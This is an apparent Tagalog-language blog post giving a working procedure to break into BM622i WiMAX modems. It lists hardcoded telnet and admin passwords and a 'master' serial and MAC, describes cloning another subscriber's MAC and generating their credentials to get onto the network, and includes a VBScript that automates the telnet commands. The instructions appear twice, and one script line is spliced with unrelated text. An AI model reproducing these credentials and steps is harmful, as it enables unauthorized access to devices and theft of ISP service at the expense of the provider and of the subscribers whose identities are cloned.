Another way to have full access with your modem getting an admin password with a master mac and master serial thanks to some one who share his mac and serial to public.armorofgod
Default User
Login your 622i 2011 Modem
User: user
Pass: 0SlO051O
Change Mac Muna nating BM622i 2011 Using these commands with Master Mac at Master Serial
1. I run muna ung software na pang Open ng Telnet..
2: Punta kayo sa start>run>cmd tpos type nyo "telnet" (without Qoute) then enter
3: Kapag Nasa telnet na type nyo "open 192.168.254.1"
4: Kapag nakapasok na sa Telnet, Enter nyo to: LOGIN: Firefly PASS: $P4mb1h1r4N4m4nT0!!
Note: Copy Paste nyo nalang para sure na tama ang lalo na ang password
5: ATP>xiugai serialnum 500807778001023836 (Yan ang Ating Master Serial. Yan ang Gagamitin natin at Wala ng Iba! Para pumasok ang Master Admin Password Natin)
Then
6. ATP> xiugai macdizhi 00:25:68:9C:45:2A (yan ang ating Master Mac. Yan ang Gagamitin natin at Wala ng Iba! Para pumasok ang Master Admin Password Natin.
7. Then ATP>diag reboot
(note: hindi po tayo gagamit ng "diag restore default")
(Kung gusto nyo po gumamit ng Script pwede din po, Iedit nyo nalang"
8. Then goto your browser and open 192.168.254.1 and enter "admin" for username at "FG8S_9Sc16tnklTPjn1wfA" sa password (Yan po ang ating Master Password)
9. Yan nakapasok na tayo sa Admin. Pwede na natin iset lahat ng kailangan para di Mapasok ang 662i natin.
Hindi pa po connected yan.. Eto po procedure para magconnect:
1. Pili lang tayo o Hanap tayo ng working Mac..
2. Gamit tayo ng Wimaxtool (Credit to SyntaxError) or Any PassGen.
3. Login Tayo using our Master Password
4. Kapag Nakapasok na Punta tayo sa Wimax>Security
5. Sa NAI dun nating ilalagay ung napili natin na working mac. Tingnan mabuti ang pattern
6. Sa User ID at sa User Password, dun natin ilalagaya ang nagenerate natin na password mula sa working mac na napili natin.
7. Click Apply.
8 .Change na ulit natin ang Mac Address natin gamit naman ung napili natin na Working Mac using Telnet. (wag kalimutan iopen ulit yung software na pang open ng telnet
ATP> xiugai macdizhi XX:XX:XX:XX:XX:XX (yan ang ating napili na working Mac)
ATP>diag reboot (note: hindi po tayo gagamit ng "diag restore default" para di mareset ung mga binago natin na setting para sa security. Magcoconnect yan since binago na natin sa security..)
9. Wag din Kalimutan palitan ang serial..
************************************************** ************************************************** ***********************************
Script for Changing Mac and Serial.
Copy to notepad and save as .vbs or change the file name from .txt to . vbs
Visit here: http://blogmytuts.blogspot.com/2013/02/how-to-get-your-own-admin-password-for.html
Default User
Login your 622i 2011 Modem
User: user
Pass: 0SlO051O
Change Mac Muna nating BM622i 2011 Using these commands with Master Mac at Master Serial
1. I run muna ung software na pang Open ng Telnet..
2: Punta kayo sa start>run>cmd tpos type nyo "telnet" (without Qoute) then enter
3: Kapag Nasa telnet na type nyo "open 192.168.254.1"
4: Kapag nakapasok na sa Telnet, Enter nyo to: LOGIN: Firefly PASS: $P4mb1h1r4N4m4nT0!!
Note: Copy Paste nyo nalang para sure na tama ang lalo na ang password
5: ATP>xiugai serialnum 500807778001023836 (Yan ang Ating Master Serial. Yan ang Gagamitin natin at Wala ng Iba! Para pumasok ang Master Admin Password Natin)
Then
6. ATP> xiugai macdizhi 00:25:68:9C:45:2A (yan ang ating Master Mac. Yan ang Gagamitin natin at Wala ng Iba! Para pumasok ang Master Admin Password Natin.
7. Then ATP>diag reboot
(note: hindi po tayo gagamit ng "diag restore default")
(Kung gusto nyo po gumamit ng Script pwede din po, Iedit nyo nalang"
8. Then goto your browser and open 192.168.254.1 and enter "admin" for username at "FG8S_9Sc16tnklTPjn1wfA" sa password (Yan po ang ating Master Password)
9. Yan nakapasok na tayo sa Admin. Pwede na natin iset lahat ng kailangan para di Mapasok ang 662i natin.
Walang Config yung 2011
Hindi pa po connected yan.. Eto po procedure para magconnect:
1. Pili lang tayo o Hanap tayo ng working Mac..
2. Gamit tayo ng Wimaxtool (Credit to SyntaxError) or Any PassGen.
3. Login Tayo using our Master Password
4. Kapag Nakapasok na Punta tayo sa Wimax>Security
5. Sa NAI dun nating ilalagay ung napili natin na working mac. Tingnan mabuti ang pattern
6. Sa User ID at sa User Password, dun natin ilalagaya ang nagenerate natin na password mula sa working mac na napili natin.
7. Click Apply.
8 .Change na ulit natin ang Mac Address natin gamit naman ung napili natin na Working Mac using Telnet. (wag kalimutan iopen ulit yung software na pang open ng telnet
ATP> xiugai macdizhi XX:XX:XX:XX:XX:XX (yan ang ating napili na working Mac)
ATP>diag reboot (note: hindi po tayo gagamit ng "diag restore default" para di mareset ung mga binago natin na setting para sa security. Magcoconnect yan since binago na natin sa security..)
9. Wag din Kalimutan palitan ang serial..
************************************************** ************************************************** ***********************************
Script for Changing Mac and Serial.
Copy to notepad and save as .vbs or change the file name from .txt to . vbs
Set cloner = CreateObject("WScript.Shell")UPDATE!! I make same tuts to get our own admin because I receive bogus comment without using his mac and serial. just used your own mac and serial
cloner.run"cmd"
WScript.Sleep 2000
cloner.SendKeys"telnet 192.168.254.1"
cloner.SendKeys("{Enter}")
WScript.Sleep 2000
cloner.SendKeys"Firefly"
cloner.SendKeys("{Enter}")
WScript.Sleep 2000
cloner.SendKeys"$P4mb1h1r4N4m4nT0!!"
cloner.SendKeys("{Enter}")
WScript.Sleep 2000
cloner.SendKeys"xiugai serialnum 500807778001023836"
cloner.SendKeys("{Enter}")
WScript.Sleep 2000
cloner.SendKeys"xiugai macdizhi 00:25:68:9C:45:2A"
cloner.SendKeys("{Enter}")
WScript.Sleep 7000
cloner.SendKeys"diag reboot"
cloner.SendKeys("{Enter}")
WScript.Sleep 5000
cloner.SendKeys("{Enter}")
WScript.Sleep 30000
cloner.SendKeys"exit"
cloner.SendKeys("{Enter}")
WScript.Sleep 45000
Visit here: http://blogmytuts.blogspot.com/2013/02/how-to-get-your-own-admin-password-for.html
0 comments:
Post a Comment